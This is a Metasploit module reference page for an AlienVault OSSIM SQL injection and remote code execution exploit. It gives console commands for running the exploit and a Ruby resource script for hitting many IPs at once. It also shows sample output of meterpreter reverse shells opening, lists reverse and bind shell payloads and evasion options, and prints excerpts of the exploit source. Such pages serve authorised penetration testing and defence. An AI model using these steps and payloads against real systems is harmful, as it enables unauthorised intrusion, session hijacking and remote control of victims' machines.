AlienVault OSSIM SQL Injection and Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/http/alienvault_sqli_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: AlienVault OSSIM SQL Injection and Remote Code Execution
Module: exploit/linux/http/alienvault_sqli_exec
Source code: modules/exploits/linux/http/alienvault_sqli_exec.rb
Disclosure date: 2014-04-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2016-8581

This module exploits an unauthenticated SQL injection vulnerability affecting AlienVault OSSIM versions 4.3.1 and lower. The SQL injection issue can be abused in order to retrieve an active admin session ID. If an administrator level user is identified, remote code execution can be gained by creating a high priority policy with an action containing our payload.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using alienvault_sqli_exec against a single host

Normally, you can use exploit/linux/http/alienvault_sqli_exec this way:

msf > use exploit/linux/http/alienvault_sqli_exec
msf exploit(alienvault_sqli_exec) > show targets
    ... a list of targets ...
msf exploit(alienvault_sqli_exec) > set TARGET target-id
msf exploit(alienvault_sqli_exec) > show options
    ... show and set options ...
msf exploit(alienvault_sqli_exec) > exploit

Using alienvault_sqli_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your alienvault_sqli_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/alienvault_sqli_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the linux/http/alienvault_sqli_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/alienvault_sqli_exec

msf6 exploit(linux/http/alienvault_sqli_exec) > show info

       Name: AlienVault OSSIM SQL Injection and Remote Code Execution
     Module: exploit/linux/http/alienvault_sqli_exec
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-04-24

Provided by:
  Sasha Zivojinovic
  xistence <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Alienvault OSSIM 4.3

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      443              yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI of the vulnerable Alienvault OSSIM instance
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an unauthenticated SQL injection vulnerability 
  affecting AlienVault OSSIM versions 4.3.1 and lower. The SQL 
  injection issue can be abused in order to retrieve an active admin 
  session ID. If an administrator level user is identified, remote 
  code execution can be gained by creating a high priority policy with 
  an action containing our payload.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-8581
  OSVDB (106252)
  https://www.exploit-db.com/exploits/33006

Module Options


This is a complete list of options available in the linux/http/alienvault_sqli_exec exploit:

msf6 exploit(linux/http/alienvault_sqli_exec) > show options

Module options (exploit/linux/http/alienvault_sqli_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the vulnerable Alienvault OSSIM instance
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Alienvault OSSIM 4.3

Advanced Options


Here is a complete list of advanced options supported by the linux/http/alienvault_sqli_exec exploit:

msf6 exploit(linux/http/alienvault_sqli_exec) > show advanced

Module advanced options (exploit/linux/http/alienvault_sqli_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                10                                                  no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/alienvault_sqli_exec module can exploit:

msf6 exploit(linux/http/alienvault_sqli_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Alienvault OSSIM 4.3

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/alienvault_sqli_exec exploit:

msf6 exploit(linux/http/alienvault_sqli_exec) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   1  payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2  payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   3  payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   4  payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   5  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   6  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/alienvault_sqli_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/alienvault_sqli_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failure retrieving admin session


Here is a relevant code snippet related to the "<PEER> - Failure retrieving admin session" error message:

96:	    if res && res.code == 200 && res.body =~ /#{marker}(.*)#{marker}/
97:	      admin_session = $1
98:	      @cookie = "PHPSESSID=" + ["#{admin_session}"].pack("H*")
99:	      print_status("Admin session cookie is [ #{@cookie} ]")
100:	    else
101:	      fail_with(Failure::Unknown, "#{peer} - Failure retrieving admin session")
102:	    end
103:	
104:	    # Creating an Action containing our payload, which will be executed by any event (not only alarms)
105:	    action = rand_text_alpha(8+(rand(8)))
106:	    res = send_request_cgi({

<PEER> - Action creation failed!


Here is a relevant code snippet related to the "<PEER> - Action creation failed!" error message:

119:	    })
120:	
121:	    if res && res.code == 200
122:	      print_status("Created Action [ #{action} ]")
123:	    else
124:	      fail_with(Failure::Unknown, "#{peer} - Action creation failed!")
125:	    end
126:	
127:	    # Retrieving the Action ID, used to clean up the action after successful exploitation
128:	    res = send_request_cgi({
129:	      'method' => 'POST',

<PEER> - Action ID retrieval failed!


Here is a relevant code snippet related to the "<PEER> - Action ID retrieval failed!" error message:

137:	
138:	    if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{action}/
139:	      @action_id = $1
140:	      print_status("Action ID is [ #{@action_id} ]")
141:	    else
142:	      fail_with(Failure::Unknown, "#{peer} - Action ID retrieval failed!")
143:	    end
144:	
145:	    # Retrieving the policy data, necessary for proper cleanup after succesful exploitation
146:	    res = send_request_cgi({
147:	      'method' => 'GET',

<PEER> - Retrieving Policy data failed!


Here is a relevant code snippet related to the "<PEER> - Retrieving Policy data failed!" error message:

157:	    if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
158:	      policy_ctx = $1
159:	      policy_group = $2
160:	      print_status("Policy data [ ctx=#{policy_ctx} ] and [ group=#{policy_group} ] retrieved!")
161:	    else
162:	      fail_with(Failure::Unknown, "#{peer} - Retrieving Policy data failed!")
163:	    end
164:	
165:	    # Creating policy which will be triggered by any source/destination
166:	    policy = rand_text_alpha(8+(rand(8)))
167:	    res = send_request_cgi({

<PEER> - Policy creation failed!


Here is a relevant code snippet related to the "<PEER> - Policy creation failed!" error message:

215:	    })
216:	
217:	    if res && res.code == 200
218:	      print_status("Created Policy [ #{policy} ]")
219:	    else
220:	      fail_with(Failure::Unknown, "#{peer} - Policy creation failed!")
221:	    end
222:	
223:	    # Retrieve policy ID, needed for proper cleanup after succesful exploitation
224:	    res = send_request_cgi({
225:	      'method' => 'POST',

<PEER> - Retrieving Policy ID failed!


Here is a relevant code snippet related to the "<PEER> - Retrieving Policy ID failed!" error message:

236:	    })
237:	    if res && res.code == 200 && res.body =~ /row id='(.*)' col_order='1'/
238:	      @policy_id = $1
239:	      print_status("Policy ID [ #{@policy_id} ] retrieved!")
240:	    else
241:	      fail_with(Failure::Unknown, "#{peer} - Retrieving Policy ID failed!")
242:	    end
243:	
244:	    # Reload the policies to make our new policy active
245:	    print_status("Reloading Policies")
246:	    res = send_request_cgi({

<PEER> - Policy reloading failed!


Here is a relevant code snippet related to the "<PEER> - Policy reloading failed!" error message:

254:	    })
255:	
256:	    if res && res.code == 200
257:	      print_status("Policies reloaded!")
258:	    else
259:	      fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
260:	    end
261:	
262:	    # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm.
263:	    dont_exist = rand_text_alpha(8+rand(4))
264:	    print_status("Triggering policy and action by requesting a non existing url")

<PEER> - Payload failed!


Here is a relevant code snippet related to the "<PEER> - Payload failed!" error message:

269:	    })
270:	
271:	    if res and res.code == 404
272:	      print_status("Payload delivered")
273:	    else
274:	      fail_with(Failure::Unknown, "#{peer} - Payload failed!")
275:	    end
276:	
277:	  end
278:	
279:	

Unable to retrieve token


Here is a relevant code snippet related to the "Unable to retrieve token" error message:

290:	
291:	      if res && res.code == 200 && res.body =~ /\{\"status\":\"OK\",\"data\":\"(.*)\"\}/
292:	        token = $1
293:	        print_status("Token [ #{token} ] retrieved")
294:	      else
295:	        print_warning("Unable to retrieve token")
296:	      end
297:	
298:	      # Remove our policy
299:	      res = send_request_cgi({
300:	       'method' => 'GET',

Unable to remove Policy ID


Here is a relevant code snippet related to the "Unable to remove Policy ID" error message:

308:	      })
309:	
310:	      if res && res.code == 200
311:	        print_status("Policy ID [ #{@policy_id} ] removed")
312:	      else
313:	        print_warning("Unable to remove Policy ID")
314:	      end
315:	
316:	      # Remove our action
317:	      res = send_request_cgi({
318:	       'method' => 'GET',

Unable to remove Action ID


Here is a relevant code snippet related to the "Unable to remove Action ID" error message:

324:	      })
325:	
326:	      if res && res.code == 200
327:	        print_status("Action ID [ #{@action_id} ] removed")
328:	      else
329:	        print_warning("Unable to remove Action ID")
330:	      end
331:	
332:	    # Reload the policies to revert back to the state before exploitation
333:	    print_status("Reloading Policies")
334:	    res = send_request_cgi({

<PEER> - Policy reloading failed!


Here is a relevant code snippet related to the "<PEER> - Policy reloading failed!" error message:

342:	    })
343:	
344:	    if res && res.code == 200
345:	      print_status("Policies reloaded!")
346:	    else
347:	      fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!")
348:	    end
349:	
350:	    ensure
351:	      super # mixins should be able to cleanup even in case of Exception
352:	    end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Sasha Zivojinovic
  • xistence <xistence[at]0x90.nl>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.